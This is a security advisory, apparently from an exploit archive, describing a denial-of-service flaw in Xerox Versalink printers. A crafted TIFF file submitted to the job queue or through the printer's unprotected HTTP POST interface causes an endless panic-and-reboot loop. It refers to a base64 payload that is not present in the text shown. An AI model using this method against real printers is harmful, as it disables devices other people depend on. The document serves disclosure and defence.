
Xerox Versalink Denial Of Service

Posted Jan 25, 2022
Authored by Mahmoud Al-Qudsi

Xerox Versalink printers suffer from a remote denial of service vulnerability using a specially crafted TIFF payload.

tags | exploit, remote, denial of service
SHA-256 | c5ca25038e516f362471c55d2acef950d200acca71cb6d5265ab1c2ea3227c3b

[+] Credits: Mahmoud Al-Qudsi
[+] Website: https://neosmart.net/
[+] Source: https://neosmart.net/blog/?p=4865
[+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart

[Vendor]
Xerox Corporation

[Product]
Xerox Versalink printers, other Xerox printers/copiers.

[Vulnerability Type]
Remote denial-of-service leading to bricked device.

[Security Issue]
A specially crafted TIFF payload may be submitted to the printer's job queue
(in person or over the network) by unauthenticated/unprivileged users, or by
network or internet attackers by means of a JavaScript payload. The device will
panic upon attempting to read the submitted file and a physical reboot will be
required. Upon reboot, the device will attempt to resume the last-printed job,
triggering the panic once more. The process repeats ad infinitum.

[Exploit/PoC]
Extract the TIFF contents of the base64-encoded archive below and submit directly
to the job queue on a vulnerable printer to trigger the exploit:

[Network Access]
Local or remote

The sample payload may also be submitted to exploit a Xerox printer with a known
IP address or host name over the web by taking advantage of the unprotected HTTP
POST interface exposed by the device on its network interface.

[Severity]
Critical

The denial-of-service attack results in a semi-permanent "bricking" of the Xerox
printer. If there are unapplied firmware updates, recovery may be possible by
forcing an update over the network, which clears the job queue in the process.
Otherwise, manually clearing the non-volatile storage memory on the device's
mainboard is required to break out of the loop.

[Disclosure Timeline]
- September 26, 2019: Reported to Xerox
- January 14, 2020: Confirmed by Xerox in response to a request for updates
- January 25, 2022: Publicly disclosed, remains unpatched and exploitable

Mahmoud


